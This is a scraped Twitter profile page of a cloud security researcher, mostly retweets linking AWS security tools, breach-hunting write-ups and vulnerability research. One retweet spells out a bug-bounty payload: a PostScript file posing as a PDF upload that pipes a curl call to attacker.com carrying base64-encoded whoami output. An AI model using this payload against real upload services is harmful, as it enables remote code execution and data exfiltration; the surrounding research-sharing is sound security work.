Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @SpenGietz
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @SpenGietz
-
Prikvačeni tweet
Got AWS keys in a pentest or through a bug bounty program? Check out these 28 AWS IAM privilege escalation methods I put together on GitHubhttps://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation …
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Spencer Gietzen proslijedio/la je Tweet
“Don’t roll your own IAM” is the modern day “Don’t roll your own crypto”
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Spencer Gietzen proslijedio/la je Tweet
I've been heads-down on final
#AWS re:Invent blogging, and need to catch up on all of the posts from the last couple of days. Unroll this thread to see them all..Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Spencer Gietzen proslijedio/la je Tweet
Policy Sentry v0.5.5 released. Includes more AWS services and allows the user to query the IAM Permissions database directly from the CLI. If you've ever wasted time searching through the IAM docs with Ctrl+F, this new feature might be for you.https://github.com/salesforce/policy_sentry …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Spencer Gietzen proslijedio/la je Tweet
"who the HELL is in my Google Doc" I think furiously, before realizing it's me in a different tab
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Spencer Gietzen proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Spencer Gietzen proslijedio/la je Tweet
Dang.. Our group chat is so boring you would rather talk ANYONE else...https://twitter.com/JJWatt/status/1196950526228865024 …
1:00Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Spencer Gietzen proslijedio/la je Tweet
While I slept,
#aws released 88 new APIs. List overtook Get as #1 verb Most interesting: cloudtrail:GetInsightSelectors Runner up: ec2:EnableFastSnapshotRestores Longest: codecommit:BatchDisassociateApprovalRuleTemplateFromRepositories Busiest: quicksight (49 new!)Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Spencer Gietzen proslijedio/la je Tweet
Such awesomeness on so many levels...
Technical walkthrough of vulnerabilities/compromise
Configuration recommendation(s) for proper monitoring & investigations
Tooling to ingest and search through logs
Threat Hunting query exampleshttps://twitter.com/ashwinpatil/status/1197180232140091392 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Spencer Gietzen proslijedio/la je Tweet
Wait is over .. Read final part 2 which is focused on aws log data ingestion ,
#hunting and investigation of Capital one breach TTPs in#AzureSentinel https://techcommunity.microsoft.com/t5/Azure-Sentinel/Hunting-for-Capital-One-Breach-TTPs-in-AWS-logs-using-Azure/ba-p/1019767 … https://twitter.com/ashwinpatil/status/1196455153009774592 …pic.twitter.com/wgEyeIocB3
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Spencer Gietzen proslijedio/la je Tweet
AWS joins GCP and Azure in protecting the instance metadata service, including additional session-based features that other cloud providers don't havehttps://amzn.to/35lDZSl
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Spencer Gietzen proslijedio/la je Tweet
Cracking reCAPTCHA, Turbo Intruder style - by
@albinowaxhttps://portswigger.net/research/cracking-recaptcha-turbo-intruder-style …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Spencer Gietzen proslijedio/la je Tweet
From the
@AWSSecurityInfo blog: Add defense in depth against open firewalls, reverse proxies, and SSRF vulnerabilities with enhancements to the EC2 Instance Metadata Servicehttps://aws.amazon.com/blogs/security/defense-in-depth-open-firewalls-reverse-proxies-ssrf-vulnerabilities-ec2-instance-metadata-service/ …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Spencer Gietzen proslijedio/la je Tweet
Check out part one of
@ashwinpatil's two-part series on the Capital One Breach! In this post, he walks through how to set up and complete the CloudGoat cloud_breach_s3 scenario.http://bit.ly/2OsN0CcHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Spencer Gietzen proslijedio/la je Tweet
In an effort to compete with Google's ongoing war on their own customers,
@awscloud has quietly rolled out a potentially breaking change to their Application Load Balancers. A thread.Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Spencer Gietzen proslijedio/la je Tweet
RCE on PDF upload: Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf" Content-Type: application/pdf %!PS currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64 …) ) .putdeviceparams quit
#BugBountyPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Spencer Gietzen proslijedio/la je Tweet
Some interesting new
#aws APIs for Single Sign Onpic.twitter.com/ByFjmB9UW5
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Spencer Gietzen proslijedio/la je Tweet
It looks like a
#BlueKeep worm has finally arrived! Kevin kindly sent me a crash dump and after some investigation I found BlueKeep artifacts in memory and shellcode to drop a Monero Miner.https://twitter.com/GossiTheDog/status/1190654984553205761 …
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Spencer Gietzen proslijedio/la je Tweet
Did you know you can use the Connection header to delete other headers? Interesting research lead by
@nj_dav: https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers …Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Spencer Gietzen proslijedio/la je Tweet
Wrote a post about some Vulnerabilities Leading to RCE in LabKey Serverhttps://rhinosecuritylabs.com/application-security/labkey-server-vulnerabilities-to-rce/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Spencer Gietzen proslijedio/la je Tweet
Check out our latest blog post, a walkthrough of the 3 different vulnerabilities discovered by
@daveysec in the LabKey Server--stored XSS, CSRF leading to RCE, and XXE allowing arbitrary file read:http://bit.ly/2WmTCpfHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.
